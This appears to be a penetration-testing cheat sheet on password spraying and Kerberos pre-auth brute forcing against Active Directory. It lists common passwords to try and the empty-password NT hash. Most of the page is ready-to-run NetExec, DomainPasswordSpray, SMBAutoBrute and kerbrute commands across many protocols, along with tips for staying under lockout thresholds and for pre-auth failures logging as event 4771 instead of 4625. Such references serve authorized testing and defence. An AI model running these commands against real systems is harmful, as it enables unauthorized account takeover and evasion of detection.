4.0 KiB
Password - Spraying
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
Most of the time the best passwords to spray are :
- Passwords:
P@ssw0rd01
,Password123
,Password1
, - Common password:
Welcome1
/Welcome01
,Hello123
,mimikatz
- $Companyname1:
$Microsoft1
- SeasonYear:
Winter2019*
,Spring2020!
,Summer2018?
,Summer2020
,July2020!
- Default AD password with simple mutations such as number-1, special character iteration (
*
,?
,!
,#
) - Empty Password: NT hash is
31d6cfe0d16ae931b73c59d7e0c089c0
⚠️ be careful with the account lockout !
Spray a pre-generated passwords list
-
Using Pennyw0rth/NetExec
nxc smb 10.0.0.1 -u /path/to/users.txt -p Password123 nxc smb 10.0.0.1 -u Administrator -p /path/to/passwords.txt nxc smb targets.txt -u Administrator -p Password123 -d domain.local nxc ldap targets.txt -u Administrator -p Password123 -d domain.local nxc rdp targets.txt -u Administrator -p Password123 -d domain.local nxc winrm targets.txt -u Administrator -p Password123 -d domain.local nxc mssql targets.txt -u Administrator -p Password123 -d domain.local nxc wmi targets.txt -u Administrator -p Password123 -d domain.local nxc ssh targets.txt -u Administrator -p Password123 nxc vnc targets.txt -u Administrator -p Password123 nxc ftp targets.txt -u Administrator -p Password123 nxc nfs targets.txt -u Administrator -p Password123
-
Using hashcat/maskprocessor to generate passwords following a specific rule
nxc smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
-
Using dafthack/DomainPasswordSpray to spray a password against all users of a domain.
Invoke-DomainPasswordSpray -Password Summer2021! Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
-
Using shellntel-acct/scripts/SMBAutoBrute.
Invoke-SMBAutoBrute -PasswordList "jennifer, yankees" -LockoutThreshold 3 Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose
BadPwdCount attribute
The number of times the user tried to log on to the account using an incorrect password. A value of
0
indicates that the value is unknown.
$ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never>
LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: <never>
Kerberos pre-auth bruteforcing
Using ropnop/kerbrute, a tool to perform Kerberos pre-auth bruteforcing.
Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771).
- Username bruteforce
./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
- Password bruteforce
./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
- Password spray
./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123 ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log